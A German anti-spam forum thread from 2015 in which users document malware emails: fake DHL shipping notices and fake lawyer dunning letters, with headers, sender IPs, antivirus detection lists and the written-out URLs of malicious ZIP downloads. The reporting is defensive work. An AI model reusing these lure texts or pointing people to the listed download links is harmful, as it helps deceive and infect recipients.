IP: 66.96.147.71 ---> 71.147.96.66.static.eigbox.net

zum Download:

http://www.teamspeakclub.com/nolp_dhl_de/ZustellnachrichtDHL_bestellung_000029937728.zip

Sollte schon totgelegt sein.

kjz1
18.03.2015, 13:49
Wieder mit Malware unterwegs:

Received: from mailout09.t-online.de (mailout09.t-online.de [194.25.134.84])
by xxxxx (Postfix) with ESMTPS
for xxxxx; Wed, 18 Mar 2015 xx:xx:xx +0100 (CET)
Received: from fwd00.aul.t-online.de (fwd00.aul.t-online.de [172.20.26.147])
by mailout09.t-online.de (Postfix) with SMTP ID: [ID filtered]
for xxxxx; Wed, 18 Mar 2015 xx:xx:xx +0100 (CET)
Received: from localhost
(Z2fyx8ZSYhELo+x1UDB8ZxMF7ql2+QOP9caer06wDC17ScnDGGGlVksGrDuyFH-Z-c@[109.232.191.195])
by fwd00.t-online.de
with (TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384 encrypted)
esmtp ID: [ID filtered]



DHL Sendungsverfolgung

*Sendungsnummer* 264822148592148
*Produkt / Service* DHL RETOURE
*Status vom Mi, 18.03.2015 xx:xx:xx* Die Sendung wurde im
Ziel-Paketzentrum
bearbeitet.
*Zugestellt an* Bevollmächtigter

Detaillierte Empfängerinformationen anzeigen

http://hashtag.com.mx/lTzKRuImog84

Download dann:

http://hashtag.com.mx/lTzKRuImog84/dhl_kundenservice_03_2015_00029493483837.zip

IP: 184.106.55.47 ---> Rackspace Hosting

ichliebespam
26.03.2015, 23:06
Return-Path: pawel.maciejewicz [at] hydromechanika.pl
Received: from ale232.rev.netart.pl ([85.128.161.232]) by mx-ha.web.de
(mxweb101) with ESMTP (Nemesis) ID: [ID filtered]
<xyx>; Thu, 26 Mar 2015 xx:xx:xx +0100
Received: from [127.0.0.1] (unknown [213.240.224.232])
by hydromechanika.nazwa.pl (Postfix) with ESMTP ID: [ID filtered]
Thu, 26 Mar 2015 xx:xx:xx +0100 (CET)
Message-ID: [ID filtered]
Date: Wed, 25 Mar 2015 xx:xx:xx -0700
From: "pawel.maciejewicz [at] hydromechanika.pl"
<pawel.maciejewicz [at] hydromechanika.pl>
Subject: info
To: 3verschiedene eMail-Adressen
Content-Type: multipart/mixed;
boundary="G7loWIuZ5G=_HDXLq5TIveqjf2f6Tmdpcg"
MIME-Version: 1.0
Reply-To: pawel.maciejewicz [at] hydromechanika.pl
X-Mailer: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.2)
Gecko/20030208 Netscape/7.02
Envelope-To: <xyx>


Alle laufenden Arbeiten wurden rechtzeitig durchgeführt ,ich verstehe nicht warum Sie immer noch nicht bezahlt haben und mir 0417 euro schulden.Kostenplan im Anhang.

Anhang Word-Dokument wichtig_4637.doc – virustotal 23 / 50


ALYac W97M.Dropper.H
AVware LooksLike.Macro.Dropper.a (v)
Ad-Aware W97M.Dropper.H
Avast Other:Malware-gen [Trj]
Avira WM/Dropper.AJ
BitDefender W97M.Dropper.H
CAT-QuickHeal W97M.Dropper.CB
Cyren W97M/Dropexe.A
DrWeb W97M.MulDrop.38
ESET-NOD32 VBA/TrojanDropper.Agent.AJ
F-Prot W97M/Dropexe.A
Ikarus Trojan-Downloader.VBA.Agent
McAfee W97M/Downloader.afb
McAfee-GW-Edition W97M/Downloader.afb
MicroWorld-eScan W97M.Dropper.H
Microsoft TrojanDropper:W97M/Gamarue
NANO-Antivirus Trojan.Script.Agent.dowcyf
Symantec Trojan.Mdropper
Tencent Win32.Trojan.Dropper.Szuy
TrendMicro W2KM_DROPPR.UKM
TrendMicro-HouseCall W2KM_DROPPR.UKM
VIPRE LooksLike.Macro.Dropper.a (v)
nProtect W97M.Dropper.H


Return-Path: harryhatta.hph [at] iil.co.id
Received: from mail.iil.co.ID: [ID filtered]
with ESMTP (Nemesis) ID: [ID filtered]
26 Mar 2015 xx:xx:xx +0100
Received: from localhost (localhost [127.0.0.1])
by mail.iil.co.ID: [ID filtered]
Thu, 26 Mar 2015 xx:xx:xx +0700 (WIB)
X-Virus-Scanned: amavisd-new at iil.co.id
Received: from mail.iil.co.ID: [ID filtered]
by localhost (mail.iil.co.ID: [ID filtered]
with ESMTP ID: [ID filtered]
Received: from localhost (localhost [127.0.0.1])
by mail.iil.co.ID: [ID filtered]
Thu, 26 Mar 2015 xx:xx:xx +0700 (WIB)
Received: from [127.0.0.1] (rrcs-24-123-40-117.central.biz.rr.com [24.123.40.117])
by mail.iil.co.ID: [ID filtered]
Thu, 26 Mar 2015 xx:xx:xx +0700 (WIB)
Message-ID: [ID filtered]
Date: Wed, 25 Mar 2015 xx:xx:xx -0700
From: "harryhatta.hph [at] iil.co.id" <harryhatta.hph [at] iil.co.id>
Subject: important
To: 3 verschiedene eMail-Adressen
Content-Type: multipart/mixed;
boundary="OunAVVVer1dri9kLlpQ=_bZgKnNRp06j9F"
MIME-Version: 1.0
Reply-To: harryhatta.hph [at] iil.co.id
X-Mailer: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5)
Gecko/20031013 Thunderbird/0.3
Envelope-To: <xyx>


Sehr geehrter Kunde,
Ihre fällige Rechnung #36211 finden Sie im Anhang.
Bitte begleichen Sie diese Rechnung bis spätestens 01.04.2015.

Wir danken Ihnen für die Zusammenarbeit und hoffen dass Sie mit unseren Service zufrieden sind.


Hochachtungsvoll

Anhang Word-Dokument Informationen_4781.doc - 22 / 57


ALYac W97M.Dropper.H
AVware LooksLike.Macro.Dropper.a (v)
Ad-Aware W97M.Dropper.H
BitDefender W97M.Dropper.H
CAT-QuickHeal W97M.Dropper.CB
Cyren W97M/Dropexe.A
DrWeb W97M.MulDrop.38
ESET-NOD32 VBA/TrojanDropper.Agent.AJ
Emsisoft W97M.Dropper.H (B)
F-Prot W97M/Dropexe.A
F-Secure W97M.Dropper.H
GData W97M.Dropper.H
Ikarus Trojan-Downloader.VBA.Agent
Kaspersky Trojan-Downloader.MSWord.Agent.hc
McAfee W97M/Downloader.afb
McAfee-GW-Edition W97M/Downloader.afb
MicroWorld-eScan W97M.Dropper.H
Microsoft TrojanDropper:W97M/Gamarue
NANO-Antivirus Trojan.Script.Agent.dowcyf
Sophos Troj/DocDl-JC
VIPRE LooksLike.Macro.Dropper.a (v)
nProtect W97M.Dropper.H

Makros in beiden 44 seitigen Word-Dokumenten deaktiviert ...

kjz1
27.03.2015, 10:51
Neue Runde:

Received: from mout.kundenserver.de ([212.227.17.24]) by mx-ha.gmx.net
(mxgmx003) with ESMTPS (Nemesis) ID: [ID filtered]
xxxxx; Fri, 27 Mar 2015 xx:xx:xx +0100
Received: from eisenbahnpeter ([79.200.116.110]) by mrelayeu.kundenserver.de
(mreue101) with ESMTPSA (Nemesis) ID: [ID filtered]
xxxxx; Fri, 27 Mar 2015 xx:xx:xx +0100

IP: 79.200.116.110 ---> p4FC8746E.dip0.t-ipconnect.de



Guten Tag Mein Name,

das von Ihnen gespeicherte Konto wurde im Moment der Abbuchung nicht
genügend gedeckt um die Kontoabbuchung durchzuführen. Sie haben eine
nicht beglichene Rechnung bei unseren Mandanten Mail & Media AG.

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen dabei, die
durch unsere Beauftragung entstandenen Gebühren von 22,23 Euro zu tragen
Wir erwarten die vollständige Zahlung einbegriffen der Mahnkosten bis
spätestens 27.03.2015 auf unser Girokonto.

Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die
Angelegenheit dem Staatsanwalt und der Schufa übergeben. Eine
vollständige Forderungsausstellung, der Sie alle Buchungen entnehmen
können, fügen wir bei. Für Fragen oder Unklarheiten erwarten wir eine
Kontaktaufnahme innerhalb des selben Zeitraums.

In Vollmacht unseren Mandanten ordnen wir Ihnen an, die offene Forderung
sofort zu bezahlen.

Mit freundlichen Grüßen

Rechtsanwalt Simons Oskar

Attachement: Forderung an Mein Name 25.03.2015 - Rechtsanwalt Mail & Media AG.zip

Was vielleicht besonders perfide ist: Sowohl in der Mail als auch im Anhang ist der Realname vorhanden, der Virus ging an eine Mailadresse bei 1&1 über einen gecrackten Server bei 1&1 und täuscht auch eine Mahnung von 1&1 vor. Die Ganoven haben also dazugelernt und verfeinern ihr social engineering.

Levitator
26.04.2015, 15:35
Dreister gehts immer und eine ZIP als anhang.

Die Frist bis zum 23.04 und Zustellung am 25.04

Ich glaube, das die Christine gar nicht weiß, das ihr Konto gekapert ist.
Habs komplett an Amazon weitergeleitet.
Vielleicht machen die mal was, was aber eher unwarscheinlich ist.
___________________________________________________________

Guten Tag "Mein kompletter Name"

Ihr Kreditinstitut hat die Lastschrift storniert. Sie haben eine nicht bezahlte Rechnung bei der Firma Amazon AG.

Wir erwarten die Überweisung zuzüglich der Gebühren bis spätestens 23.04.2015 auf unser Bankkonto.
Aufgrund des andauernden Zahlungsverzug sind Sie verpflichtet zuzüglich, die durch unsere Beauftragung entstandenen Gebühren von 20,31 Euro zu tragen. Namens unseren Mandanten fordern wir Sie auf, die offene Forderung schnellstens zu begleichen. Bei Rückfragen oder Reklamationen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa übergeben. Die detaillierte Forderungsausstellung, der Sie alle Buchungen entnehmen können, fügen wir bei.

Mit verbindlichen Grüßen

Inkasso Franck Joshua


X-UIDL-JANA-SERVER: [UID filtered]
Return-Path: christinefrench [at] tiscali.co.uk
Received: from out.ipsmtp3nec.opaltelecom.net ([62.24.202.75]) by
mx-ha.gmx.net (mxgmx004) with ESMTPS (Nemesis) ID: [ID filtered]
for <meine poor [at] spamvictim.tld>; Sat, 25 Apr 2015 xx:xx:xx +0200
X-SMTPAUTH: christinefrench [at] tiscali.co.uk
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: A2CfBABzwjhV/7wgji7VIQICAYEM
X-IPAS-Result: A2CfBABzwjhV/7wgji7VIQICAYEM
X-IronPort-AV: E=Sophos;i="5.11,630,1422921600";
d="com'96?zip'96,48?scan'96,48,208,96,48";a="555842110"
Received: from 188-32-142-46.pool.kielnet.net (HELO frommhol-dg4htm) ([46.142.32.188])
by out.ipsmtp3nec.opaltelecom.net with ESMTP; 23 Apr 2015 xx:xx:xx +0100
From: "Inkasso Amazon AG" <christinefrench [at] tiscali.co.uk>
To: "Mein voller Name" <meine poor [at] spamvictim.tld>
Subject: Offene Rechnung von Amazon 11683732
Date: Thu, 23 Apr 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0097_2A696BDD.54821ECE"
Envelope-To: <meine poor [at] spamvictim.tld>
X-GMX-Antispam: 0 (Mail was not recognized as spam); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: notjunk:1;..................

Frechdachs
29.04.2015, 08:16
Moin zusammen,

grade hab wohl was neues im Spamordner gefunden.
Guten Tag "Mein Name",

Sie haben eine nicht bezahlte Rechnung bei unseren Mandanten Pay Online24 GmbH. Das von Ihnen vorliegende Konto ist nicht genügend gedeckt um die Lastschrift zu realisieren.

Wir erwarten die gesamte Überweisung zuzüglich der Gebühren bis spätestens 30.04.2015 auf unser Konto. Aufgrund des andauernden Zahlungsausstands sind Sie gebunden zusätzlich, die durch unsere Beauftragung entstandenen Gebühren von 38,62 Euro zu tragen. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die noch offene Gesamtforderung sofort zu bezahlen. Bei Rückfragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von 72 Stunden. Die detaillierte Forderungsausstellung, der Sie alle Positionen entnehmen können, int beigelegt.

Es erfolgt keine weitere Mahnung. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Gericht und der Schufa übergeben.

Mit verbindlichen Grüßen

Rechnungsstelle Haas Jamie
Das ging zwar an meinen richtigen Namen, aber an eine andere Mailadresse, der ich meinen Namen nicht zugeordnet habe.

Return-Path: fops [at] dustpirates.com
Received: from mx14lb.world4you.com ([81.19.149.124]) by mx-ha.gmx.net
(mxgmx102) with ESMTPS (Nemesis) ID: [ID filtered]
<Name [at] gmx.de>; Tue, 28 Apr 2015 xx:xx:xx +0200
Received: from [95.90.238.147] (helo=Lenovo-PC)
by mx14lb.world4you.com with esmtpsa (TLSv1:AES256-SHA:256)
(Exim 4.77)
(envelope-from <fops [at] dustpirates.com>)
ID: [ID filtered]
for poor [at] spamvictim.tld; Tue, 28 Apr 2015 xx:xx:xx +0200
From: "Rechnungsstelle Pay Online24 GmbH" <fops [at] dustpirates.com>
To: "Mein Name" <poor [at] spamvictim.tld>
Subject: =?utf-8?q?Die automatische Kontoabbuchung von Pay Online24 konnte nicht durchgef=C3=BChrt werden?=
Date: Tue, 28 Apr 2015 xx:xx:xx GMT
Message-ID: [ID filtered]
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0053_0DA84E3A.39DB9B77"
X-SA-Do-Not-Run: Yes
X-AV-Do-Run: Yes
X-SA-Exim-Connect-IP: 95.90.238.147
X-SA-Exim-Mail-From: fops [at] dustpirates.com
X-SA-Exim-Scanned: No (on mx14lb.world4you.com); SAEximRunCond expanded to false
Envelope-To: <poor [at] spamvictim.tld>
X-GMX-Antispam: 6 (nemesis text pattern profiler); Detail=V3;
X-GMX-Antivirus: 0 (no virus found)
X-UI-Filterresults: junk:von mir gekürzt

------=_NextPart_000_0053_0DA84E3A.39DB9B77
Content-Type: text/plain;
charset="utf-8"
Content-Transfer-Encoding: quoted-printable

Anhang
Rechnung nicht gedeckten Zahlung Ihrer Bestellung Pay Online24 GmbH vom 27.04.2015.zip 95,0KB

Gruß Frechdachs

kjz1
29.04.2015, 12:02
Diesmal Download von gecracktem Server:

Received: from mout-xforward.gmx.net (mout-xforward.gmx.net [82.165.159.41])
by xxxxx (Postfix) with ESMTPS for xxxxx; Wed, 29 Apr 2015 xx:xx:xx +0200 (CEST)
Received: from localhost ([95.90.241.97]) by mail.gmx.com (mrgmx103) with ESMTPSA (Nemesis) ID: [ID filtered]

IP: 95.90.241.97 ---> ip5f5af161.dynamic.kabel-deutschland.de


Geschätzte Kundin, geschätzter Kunde,

Ihre Sendung *716337423771633747* wurde an DHL übergeben und wird
voraussichtlich am Mittwoch, den *29.04.* zwischen 12:00 und 16:30 Uhr
zugestellt.

Status der Sendung ist bei DHL abrufbar. http://yad-efraim.org/DyINhZ3

Bitte halten Sie den *Nachnahmebetrag in Höhe von 13.9 Euro* passend bereit.

Viele Grüße
Ihr DHL Team

Download von:

http://yad-efraim.org/DyINhZ3/Status_DHL_Sendungsverfolgung__29__04__2015.zip

kjz1
29.04.2015, 20:39
Von den Ganoven aus der neuen Runde:

Received: from cp30.ezyreg.com ([202.191.62.218]) by mx-ha.gmx.net (mxgmx001) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from [88.77.217.140] (port=50856 helo=s1) by cp30.ezyreg.com with esmtpsa (TLSv1:AES128-SHA:128) (Exim 4.82) (envelope-from <tim.powers [at] altegis.com.au>) ID: [ID filtered]

IP: 88.77.217.140 ---> dslb-088-077-217-140.088.077.pools.vodafone-ip.de

gecrackt: tim.powers [at] altegis.com.au


Guten Tag mein Name,

Sie haben eine nicht bezahlte Forderung bei der Firma Pay Online AG. Das
von Ihnen angegebene Girokonto wurde im Moment der Abbuchung nicht
hinreichend gedeckt um die Lastschrift zu realisieren.

Die Überweisung erwarten wir bis zum 04.05.2015. Aufgrund des
bestehenden Zahlungsausstands sind Sie gezwungen zusätzlich, die durch
unsere Tätigkeit entstandenen Kosten von 35,46 Euro zu bezahlen. In
Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung
sofort zu decken. Bei Fragen oder Unklarheiten erwarten wir eine
Kontaktaufnahme innerhalb von 72 Stunden. Die vollständige
Forderungsausstellung, der Sie alle Positionen entnehmen können, int
beigelegt.

Es erfolgt keine weitere Erinnerung oder Mahnung. Nach Ablauf der
festgelegten Frist wird die Akte dem Staatsanwalt und der Schufa übergeben.

Mit freundlichen Grüßen

Stellvertretender Sachbearbeiter Mayer Elias

im Anhang; Forderung stornierten Lastschrift Ihrer Bestellung Pay Online AG vom 29.04.2015.zip

nichts Gutes:

http://virusscan.jotti.org/de/scanresult/62535d2e8395db38f044a2f9bae583ec9ed6db6c

https://www.virustotal.com/de/file/7122428ff03060915c73b2a2c95f9d7cbf44354da4ec031ced4f7d00760d6c64/analysis/1430326458/

Katzina
29.04.2015, 22:12
82.165.159.36 Return-Path: ***@donner-partner.com
Received: from mout-xforward.kundenserver.de ([82.165.159.36]) by mx-ha.web.de (mxweb103) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost ([188.111.108.206]) by mrelayeu.kundenserver.de (mreue103) with ESMTPSA (Nemesis) ID: [ID filtered]
Subject: Paketlieferung zu Ihrer Sendung 343038539834303858
From: "DHL Logistik-Team"<***@donner-partner.com>
To: ****e
X-Mailer: Microsoft Windows Live Mail 15.4.3538.513
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="jE2PnlQPDAs0naJR"
Date: Wed, 29 Apr 2015 xx:xx:xx +0200
Message-ID: [ID filtered]
X-Provags-ID: [ID filtered]
X-UI-Out-Filterresults: junk:10;



Sehr geehrte DHL-Kundin, sehr geehrter DHL-Kunde,

Ihre Sendung 343038539834303858 ist bei DHL eingetroffen und wird voraussichtlich am Mittwoch, den 29.04. zwischen 10:00 und 16:30 Uhr ausgeliefert.

Über diesen Link können Sie den aktuellen Status der Sendung bei DHL abrufen.

Mit besten Grüßen,
Ihr DHL Team

Diese E-Mail soll lediglich informieren und garantiert nicht die Zustellung der Sendung. Auf diese Mail müssen Sie nicht antworten. Ihre Kontakt-E-Mail wird nur für die Ankündigung der Sendung verwendet. Eine Nutzung zu Werbezwecken ist nicht vorgesehen.
Deutsche Post AG
Charles-de-Gaulle-Str. 20
53113 Bonn
Registergericht Bonn
HRB 6792
USt-IdNr.: DE 169838187

Vertreten durch den Vorstand
***
Website
Kontakt
Impressum

© 2015 DHL

Ostfriese
29.04.2015, 22:56
Das dürfte wohl eher ein Phishing-Versuch sein, als Spam

Gerlach
30.04.2015, 00:02
Oder ein weiteres Beispiel dafür wie persönliche Daten von Unternehmen skrupelos für die "Optimierung der eigenen Prozesse" herangezogen werden, wenn man ihrer habhaft wird. Das Interesse der DHL liegt auf der Hand: Der Empfänger soll möglichst die Sendung beim ersten Zustellversuch annehmen, dann wird der Gewinn maximiert. Dem soll diese E-Mail-Benachrichtigung förderlich sein und ob der Empfänger dem zustimmt wird er vorsichtshalber gar nicht erst gefragt.

Dabei wäre der korrekte Umgang mit den Daten so einfach: Bei der Bestellung kreuzt man auf Wunsch einfach ein "Ja, ich will vom Versanddienstleister über den Status der Zustellung per E-Mail informiert werden." an - dann ist das korrekt und alle anderen werden nicht belästigt.

UWG-Hunter
30.04.2015, 02:29
Da kommt dann von DHL auf Nachfrage, dass man nur ein §11er BDSG sei und man sich an den Auftraggeber richten solle..

Der Auftraggeber wiederrum macht in seiner Antwort auf die Nachfrage einen auf "Kundenfreundlichkeit" und "doch nur nett gemeint" und kriegt nach Meldung an die Landesdatenschützer von denen dann erklärt,
dass die übermittlung der emailadresse nicht zur Ausführung des Vertrages benötigt wird und somit nicht zulässig ist, also missbräuchlich geschah - normalerweise dann wieder ein Unternehmen weniger,
das sowas nochmal macht, schon deshalb immer und grundsätzlich (per mail, geht ja schnell) an die Landesdatenschützer melden.

Nur so spricht sich das in den Händlerforen rum (in deren Foren wird das mit den Häkchen bei "ich stimme der Weitergabe meiner emailadresse an den Versanddienstleister zu" immer mehr favorisiert)

Damit wäre allen geholfen - denen, die das wollen und denen, die das nicht wollen..

Smart
30.04.2015, 05:19
Ich hatte von der DHL auch diesen Müll bekommen, bekommt man 5 Pakete von einem Absender an einen Tag, dann bekommt man auch 5 mal eine Mail. Telefonische Beschwerden sind zwecklos. Brief an den Vorstand und schon gab es keine Benachrichtigungen mehr.

Die Mail nimmt die DHL von der Anmeldung an der Packstation so die Aussage der DHL. Kann aber nicht stimmen denn eine Bekannte hat etwas per Mail bestellt, sie hat keine Packstation, und bekam die Benachrichtigung per Mail. Also hat der Absender des Paketes die Mail an DHL weitergegeben.

UWG-Hunter
30.04.2015, 05:51
Brief an den Vorstand und schon gab es keine Benachrichtigungen mehr.

Was aber, wenn man eine eigene Domain hat und immer wieder verschiedene Emailadressen (es kommen ja immerneue dazu und welche fallen weg) mit diesen Statusmails belästgt werden
lt. Datenschutz DHL kommt dann immer ein "haben diese emailadresse mit auf die Sperrliste gesetzt" und bei der nächsten gehts weiter, bin da derzeit auch am ausklabüstern.

Kannst du mir mal die Vorstandsadresse schicken, an die du das genau geschickt hast oder hier einstellen? - Dann probier Ich das auch noch, geht ja schon Monate hin und her..

Mittwoch
30.04.2015, 07:49
Das dürfte wohl eher ein Phishing-Versuch sein, als Spam
Das ist kein Phishing-Versuch (welche Daten sollte man denn hinterlegen?), sondern eine Mail, mit der sich ein Schädling verbreiten will.

Indizien:

DHL würde wohl kaum eine Absenderadresse unter der Domain donner-partner.com verwenden.
Die absendende IP ist 188.111.108.206, eine deutsche Dialin-IP. Vermutlich stammt die Mail also von einem Zombie aus einem Botnetz, der der Person gehört, die die eben angesprochene Mailadresse nutzt. Die Mail wurde beim kundenserver.de eingeliefert, einem Mitglied der Familie von United Internet. Und dort muss man sich authentifizieren, was die Absenderadresse erklären würde. Passt diese nicht zum Login, wird die Annahme verweigert.
Die von Katzina leider nicht wiedergegebene Linkadresse führt mit hoher Wahrscheinlichkeit über mehrere Zwischenstationen zu einer ZIP-Datei, die den Schädling enthält. Beispiele sind weiter oben nachzulesen.


Ich habe das Thema entsprechend umgetackert.


Oder ein weiteres Beispiel dafür wie persönliche Daten von Unternehmen skrupelos für die "Optimierung der eigenen Prozesse" herangezogen werden, wenn man ihrer habhaft wird.
Ich persönlich finde solche Mails, sollten sie denn nicht illegalen Zweecken dienen wie hier, durchaus hilfreich. Auch wenn ich meinen Tag deswegen nicht umstrukturiere.

Aber wie gesagt, diese Mail hat mit DHL nichts zu tun, sie benutzt lediglich Mimikry.

Schönen Gruß
Mittwoch

Katzina
30.04.2015, 21:06
Mittwoch

Die von Katzina leider nicht wiedergegebene Linkadresse führt mit hoher Wahrscheinlichkeit über mehrere Zwischenstationen zu einer ZIP-Datei, die den Schädling enthält. Beispiele sind weiter oben nachzulesen.

Der Link war dieser Satz, der als "Link" unterlegt war und den man dann anklicken sollte, was ich aber nicht tat:



Über diesen Link können Sie den aktuellen Status der Sendung bei DHL abrufen.

Ich habe in der ganzen letzten Zeit aber kein Paket erwartet - der Absender schließt auf "Donner-Partner Bildungszentren" hin, und ich nehme deshalb auch an, wie es Mittwoch beschrieb, dass diese Adresse gehackt wurde.
http://www.donner-partner.de/

madman70
03.05.2015, 18:02
Und wieder mal ein "Rechtsanwalt", der mittels einer (mit diversen Rechtschreib- und Interpunktionsfehlern versehenen) Mail einen Trojaner loswerden will:



Sehr geehrter Kunde xxxxx,

Sie haben eine nicht gedeckte Forderung beim Unternehmen GiroPay AG. Das von Ihnen gespeicherte Girokonto ist nicht hinreichend gedeckt um die Lastschrift auszuführen.

Wir erwarten die Zahlung bis spätestens 06.05.2015 auf unser Girokonto Aufgrund des andauernden Zahlungsverzug sind Sie gebunden zuzüglich, die durch unsere Beauftragung entstandenen Kosten von 21,82 Euro zu bezahlen. In Vollmacht unseren Mandanten ordnen wir Ihnen an, die noch offene Gesamtforderung sofort zu begleichen. Bei Fragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb von 48 Stunden. Eine vollständige Kostenaufstellung, der Sie alle Positionen entnehmen können, ist beigefügt.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der Frist wird die Akte dem Gericht und der Schufa übergeben.

Mit besten Grüßen

Rechtsanwalt Hoffmann Niklas


Daran hängt dann ein doppelt gezipptes Anhängsel, im Inneren eine *.com mit einem Trojaner -> https://www.virustotal.com/de/file/b63a72e3b09dd50b505b3f9825ba099c34b32d5ecf9cdfa7fb4a61a94943cfbd/analysis/1430668371/ ...

Hier noch der Kopf der Mail:


Received: from mout.kundenserver.de ([212.227.126.187]) by mx-ha.web.de
(mxweb108) with ESMTPS (Nemesis) ID: [ID filtered]
<xxxxx [at] web.de>; Sun, 03 May 2015 xx:xx:xx +0200
Received: from ich-PC ([79.219.72.242]) by mrelayeu.kundenserver.de (mreue002)
with ESMTPSA (Nemesis) ID: [ID filtered]
Sun, 03 May 2015 xx:xx:xx +0200
From: "Rechtsanwalt GiroPay AG" <varric [at] online.de>


Scheint von einem (verseuchten?) PC zu kommen - die IP ist aus dem Bereich der Telekom 79.219.72.242...

kjz1
07.05.2015, 14:39
Wieder mal DHL um 3 Ecken:

Received: from mx0.kapper.net ([94.136.22.130]) by mx-ha.gmx.net (mxgmx110)
with ESMTPS (Nemesis) ID: [ID filtered]
Received: from localhost (localhost.localdomain [127.0.0.1]) by mx0.kapper.net (Postfix) with ESMTP ID: [ID filtered]
for xxxxx; Thu, 7 May 2015 xx:xx:xx +0200 (CEST)
Received: from mx0.kapper.net ([127.0.0.1])
by localhost (mx0.kapper.net [127.0.0.1]) (amavisd-new, port 10024) with ESMTP ID: [ID filtered]
Received: from localhost (ip-90-186-85-210.web.vodafone.de [90.186.85.210]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) (Authenticated sender: eickhoff [at] manufuture.at) by mx0.kapper.net (Postfix) with ESMTPSA ID: [ID filtered]

gecrackt: eickhoff [at] manufuture.at


Hoch geschätzte Kundin, hoch geschätzter Kunde,

Ihre Sendung *42554789985* ist bei DHL eingetroffen und wird
voraussichtlich am
Donnerstag, den *07.05.* zwischen 10:00 und 20:30 Uhr ausgeliefert.

Bitte halten Sie den *Nachnahmebetrag in Höhe von 14.9 Euro* passend bereit.

Mit freundlichen Grüßen,
Ihre Versandabteilung, DHL


Der Versand dieser E-Mail zielt auf Bereitstellung von Informationen ab.
Die Nachricht garantiert nicht die Auslieferung der Sendung. Bitte antworten
Sie nicht auf diese Nachricht, da die Verarbeitung der Antworten auf
Informationsnachrichten abgeschaltet ist. Ihre E-Mail-Adresse wurde
gespeichert nur zum Zweck, eventuell anstehende Auslieferung von Sendungen
anzukündigen. An diese Adresse werden keine Botschaften gesendet.

Im Quelltext war kein Link enthalten, aber ein PDF-Anhang. Dieser PDF-Anhang selbst war sauber. Aber er enthielt einen Link zum Malware-Download:

http://pelestudios.tv/mcxQ0D6wfIBW/Status_zu_Sendung_916907832086.zip

IP: 166.62.42.225 ---> ip-166-62-42-225.ip.secureserver.net/Godaddy

Report:

https://www.virustotal.com/de/file/75f685daaac914bbb5c5670ee3abfd11c4503cd594e4536fc46da44d2181cb13/analysis/

Und dies versucht die Malware:

https://anubis.iseclab.org/?action=result&task_id=109c71d9b88cce12435f3eb79511eccca&format=html

kjz1
14.05.2015, 20:20
Wieder mal unterwegs:

Received: from smtp21.services.sfr.fr ([93.17.128.2]) by mx-ha.gmx.net
(mxgmx012) with ESMTPS (Nemesis) ID: [ID filtered]
Received: from filter.sfr.fr (localhost [80.187.100.100]) by msfrf2117.sfr.fr (SMTP Server) with ESMTP ID: [ID filtered]
Received: from idea-PC (tmo-100-100.customers.d1-online.com [80.187.100.100]) (using TLSv1 with cipher AES128-SHA (128/128 bits)) (No client certificate requested) by msfrf2117.sfr.fr (SMTP Server) with ESMTP ID: [ID filtered]


Guten Tag <mein richtiger Name>,

Sie haben eine nicht gedeckte Rechnung beim Unternehmen DirectPay AG.
Das von Ihnen gespeicherte Konto ist nicht hinreichend gedeckt um die
Lastschrift zu realisieren.

Wir erwarten die Überweisung inklusive der Zusatzgebühren bis zum
18.05.2015 auf unser Girokonto. Aufgrund des andauernden
Zahlungsausstands sind Sie gebunden zuzüglich, die durch unsere
Tätigkeit entstandenen Gebühren von 54,15 Euro zu tragen. Namens und in
Vollmacht unseren Mandanten fordern wir Sie auf, die noch offene
Forderung unverzüglich zu begleichen. Bei Fragen oder Unklarheiten
erwarten wir eine Kontaktaufnahme innerhalb von 48 Stunden. Eine
vollständige Forderungsausstellung, der Sie alle Einzelpositionen
entnehmen können, ist beigefügt. Nach Ablauf der Frist wird die Akte dem
Gericht und der Schufa übergeben.

Mit freundlichen Grüßen

Stellvertretender Sachbearbeiter von Altenhaus Maxim

Im Anhang: Ausgleich stornierten Lastschrift Ihrer Bestellung DirectPay AG vom 12.05.2015.zip

http://virusscan.jotti.org/de/scanresult/e8c22e948a95d4ebd55deb8e2df2809a46a7d6cb

https://www.virustotal.com/de/file/5ab0d0cdb5b7b65037e0b815bc1ff7c124167b312302b3c7adb13ef6ea9d5b2c/analysis/1431591516/

Erschreckend vielleicht: man wird mit richtigem Namen angesprochen, auch wenn Groß- und Kleinschreibung nicht ganz korrekt sind. Hier wurde definitiv eine Datenbank abgegriffen.

Mittwoch
15.05.2015, 01:36
Hier wurde definitiv eine Datenbank abgegriffen.
Oder ein Adressbuch auf einem Rechner eines Freundes/Bekannten/Verwandten/Geschäftspartners von einem Schädling nach Hause übermittelt. Das jedenfalls halte ich bei mir für die fast sichere Quelle für Mails mit meinem richtigen Namen als Anrede.

Schönen Gruß
Mittwoch

kjz1
15.05.2015, 10:37
Oder ein Adressbuch auf einem Rechner eines Freundes/Bekannten/Verwandten/Geschäftspartners von einem Schädling nach Hause übermittelt.

Dann wäre die Schreibweise des Namens aber korrekt. Ich bin mir recht sicher, dass dies ein Tippfehler meinerseits war. Allerdings kann ich mich nicht mehr erinnern, bei welchem Online-Händler.

Katzina
18.05.2015, 21:04
